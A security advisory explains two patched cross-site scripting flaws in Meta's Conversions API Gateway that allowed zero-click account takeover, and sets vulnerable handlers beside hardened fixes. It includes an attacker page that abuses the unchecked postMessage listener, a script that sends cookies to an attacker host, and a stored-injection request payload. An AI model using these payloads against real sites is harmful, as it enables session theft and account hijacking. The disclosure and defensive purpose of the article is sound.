Meta Patches XSS Flaws in Conversions API Gateway Enabling Zero-Click Account Takeover
Take action: If you run a self-hosted Meta Conversions API Gateway, this is important and urgent. The gateway is exposed to the internet by design (it serves the tracking script and receives events), so the vulnerable endpoints are reachable by anyone, and with the full writeup public the exploit is now trivial to reproduce. Patch it.
Meta patched two flaws in its Conversions API Gateway that allowed attackers to hijack Facebook accounts without any user interaction.
The gateway script, capig-events.js, runs on Meta's main domains and millions of third-party websites. This wide reach turned a tracking tool into a massive supply-chain risk.
The first vulnerability was a missing origin check on the client side. The script's window message listener accepted configuration data through postMessage but never verified event.origin, so any page that could obtain a handle to a window running the script (for example by opening it with window.open) could feed it messages. Attackers used this to deliver a bootstrap payload that made the script load external JavaScript from an attacker-controlled server. Content Security Policy would normally block such a script load on Meta's main pages; the researchers sidestepped it by targeting specific logged-out help pages and mobile WebView configurations with a more permissive policy.
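To make the listener-side defect concrete, here is an added illustration (not capig-events.js itself and not Meta's code) of a bootstrap handler in the unsafe shape described above, next to a hardened version. The message type IWL_BOOTSTRAP, the pixel_id field and the /sdk/<pixel_id>/iwl.js path are taken from the exploit in this article; the sdk_host message field, the gateway host and the origin allow-list are assumptions made for the example.

```javascript
// Added example, not the gateway's own code. Names marked "assumed" are
// illustrative and do not describe capig-events.js.

const GATEWAY_HOST = 'https://gw.conversionsapigateway.com'; // assumed fixed host
const TRUSTED_ORIGINS = new Set([                             // assumed allow-list
  'https://www.facebook.com',
  'https://business.facebook.com',
]);

// Vulnerable: no origin check, and the script location is built from data
// that any window able to call postMessage() on this one can supply.
function vulnerableBootstrap(event, loadScript) {
  const data = event.data || {};
  if (data.msg_type !== 'IWL_BOOTSTRAP') return null;
  const host = data.sdk_host || GATEWAY_HOST; // attacker chooses the host (assumed field)
  const url = `${host}/sdk/${data.pixel_id}/iwl.js`;
  loadScript(url);
  return url;
}

// Hardened: verify the sender first, validate the message shape, and never
// derive the script host from message content. This does not rely on CSP.
function hardenedBootstrap(event, loadScript) {
  if (!TRUSTED_ORIGINS.has(event.origin)) return null;
  const data = event.data;
  if (!data || typeof data !== 'object' || data.msg_type !== 'IWL_BOOTSTRAP') return null;
  const pixelId = String(data.pixel_id);
  if (!/^\d{1,20}$/.test(pixelId)) return null; // rejects path tricks such as "../"
  const url = `${GATEWAY_HOST}/sdk/${pixelId}/iwl.js`;
  loadScript(url);
  return url;
}

// Simulates a MessageEvent reaching window.onmessage and records what a
// handler would have loaded. Returns the chosen URL (or null) and the loads.
function deliver(handler, message) {
  const loaded = [];
  const url = handler({ origin: message.origin, data: message.data }, (u) => loaded.push(u));
  return { url, loaded };
}

// Constructed message mirroring the article's attacker page; the assumed
// sdk_host field points at a host the attacker controls.
const ATTACKER_MESSAGE = {
  origin: 'https://attacker.com',
  data: {
    msg_type: 'IWL_BOOTSTRAP',
    pixel_id: '1234567890',
    sdk_host: 'https://compromised.third-party.com',
    session_start_time: 0,
  },
};

// Stand-alone run: the vulnerable handler loads the attacker's script, the
// hardened one loads nothing.
console.log(deliver(vulnerableBootstrap, ATTACKER_MESSAGE));
console.log(deliver(hardenedBootstrap, ATTACKER_MESSAGE));
```

Note that the attacker sends with targetOrigin '*' and that does not matter; the only defence is on the receiving side, in the event.origin check and in refusing to let message content decide where code is fetched from. Where the expected sender is a specific window, comparing event.source against that window reference is a useful second check.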
Example:

Attacker's malicious page:

```html
<!-- attacker.com/exploit.html -->
<script>
// Open Meta's help page (which has relaxed CSP). The opener keeps a
// reference to the new window and can postMessage() to it.
var targetWindow = window.open('https://www.meta.com/help/', 'test');
// Wait for the page and capig-events.js to load
setTimeout(function () {
  // Send the malicious IWL_BOOTSTRAP message. targetOrigin '*' is fine for
  // the attacker; the bug is that the receiver never checks event.origin.
  targetWindow.postMessage({
    msg_type: 'IWL_BOOTSTRAP',
    pixel_id: '1234567890', // Valid pixel ID
    session_start_time: Date.now()
  }, '*');
}, 2000);
</script>
```

Attacker's hosted script (on compromised third-party domain):

```javascript
// https://compromised.third-party.com/sdk/1234567890/iwl.js
// This executes in the www.meta.com context, so document.cookie is Meta's.
document.location = 'https://attacker.com/steal?cookies=' + document.cookie;
```

The second flaw was a stored injection bug in the gateway's backend. The Java-based service generated the JavaScript file by concatenating user-supplied JSON values straight into the script, with no escaping or validation. An attacker could place a quote character in a rule field to terminate the string literal, close the surrounding structure and append arbitrary JavaScript. Because the malicious rule was stored, the gateway then served the attacker's code to every visitor automatically.
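The generation step behind the second flaw, shown here as an added example in JavaScript rather than the gateway's actual Java code: first the unsafe pattern (raw values concatenated into the script), then the same output built with proper serialisation. The rule fields and the payload are the ones from the malicious request in this article; the exact shape of the emitted cbq.config.set call is an assumption made so the article's payload parses the way it describes.

```javascript
// Added example, not the gateway's code. The emitted statement shape is an
// assumption for illustration; the field names and payload are the article's.

// Payload from the article's malicious POST body (constructed here inline).
const MALICIOUS_RULE = {
  pixel_id: '1234567890',
  domain_uri: 'https://www.meta.com',
  event_type: 'PageView","id":"x"}]});alert(document.domain);//',
  extractor_type: 'CSS',
  id: 'malicious_rule',
};

// Vulnerable: string concatenation. A quote in any value ends the literal.
function buildConfigUnsafe(rule) {
  return 'cbq.config.set("' + rule.pixel_id + '", "IWLParameters", {params: [{' +
    '"domain_uri":"' + rule.domain_uri + '",' +
    '"event_type":"' + rule.event_type + '",' +
    '"extractor_type":"' + rule.extractor_type + '",' +
    '"id":"' + rule.id + '"' +
    '}]});';
}

// Hardened: serialise the whole value as JSON, then neutralise the characters
// that are legal JSON but dangerous inside an inline <script> block.
function jsLiteral(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')      // blocks "</script>" breakouts
    .replace(/\u2028/g, '\\u2028') // line separators some engines treat as newlines
    .replace(/\u2029/g, '\\u2029');
}

function buildConfigSafe(rule) {
  const params = [{
    domain_uri: rule.domain_uri,
    event_type: rule.event_type,
    extractor_type: rule.extractor_type,
    id: rule.id,
  }];
  return 'cbq.config.set(' + jsLiteral(rule.pixel_id) + ', "IWLParameters", {params: ' +
    jsLiteral(params) + '});';
}

// Executes the generated file the way a visitor's browser would, with stubs
// standing in for the real cbq object, alert() and document. Returns what
// the script did: the config.set() calls it made and any alert() it triggered.
function runGenerated(code) {
  const calls = { set: [], alerts: [] };
  const cbq = { config: { set: (...args) => calls.set.push(args) } };
  const alert = (msg) => calls.alerts.push(msg);
  const document = { domain: 'www.meta.com' };
  new Function('cbq', 'alert', 'document', code)(cbq, alert, document);
  return calls;
}

// Stand-alone run: the unsafe build fires alert(); the safe build keeps the
// payload inside the event_type string where it is inert.
console.log(runGenerated(buildConfigUnsafe(MALICIOUS_RULE)));
console.log(runGenerated(buildConfigSafe(MALICIOUS_RULE)));
```

The point of jsLiteral is that JSON.stringify alone is almost enough: it escapes quotes and backslashes, which is what defeats this payload, but a value containing </script> would still close an inline script tag, so the < is escaped as well. In the Java backend the equivalent is a real JSON encoder for every value rather than string building, plus rejecting rule fields that do not match the expected shape at the API boundary.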
Example:

Malicious POST request to create IWL rule:

```http
POST /iwl/rules HTTP/1.1
Host: gw.conversionsapigateway.com

{
  "pixel_id": "1234567890",
  "domain_uri": "https://www.meta.com",
  "event_type": "PageView\",\"id\":\"x\"}]});alert(document.domain);//",
  "extractor_type": "CSS",
  "id": "malicious_rule"
}
```

Resulting injected code in capig-events.js:

```javascript
cbq.config.set("1234567890", "IWLParameters", {
  params: {
    "domain_uri": "https://www.meta.com",
    // the quote ends the string, "}]});" closes the structure and the call,
    // alert() runs, and "//" comments out the rest of the generated line
    "event_type": "PageView","id":"x"}]});alert(document.domain);//",
    "extractor_type": "CSS",
    "id": "malicious_rule"
  }
});
```

These flaws allowed for large-scale account takeovers. By running code in a trusted Meta context, attackers could steal session tokens and change account security settings. The impact extended beyond Meta's own servers because the gateway is open-source: any organization hosting its own instance of the tool was equally exposed to these silent attacks.
Meta has fixed both issues and paid the researchers $312,500 in total bounties. Organizations using self-hosted gateways must update to the latest version immediately.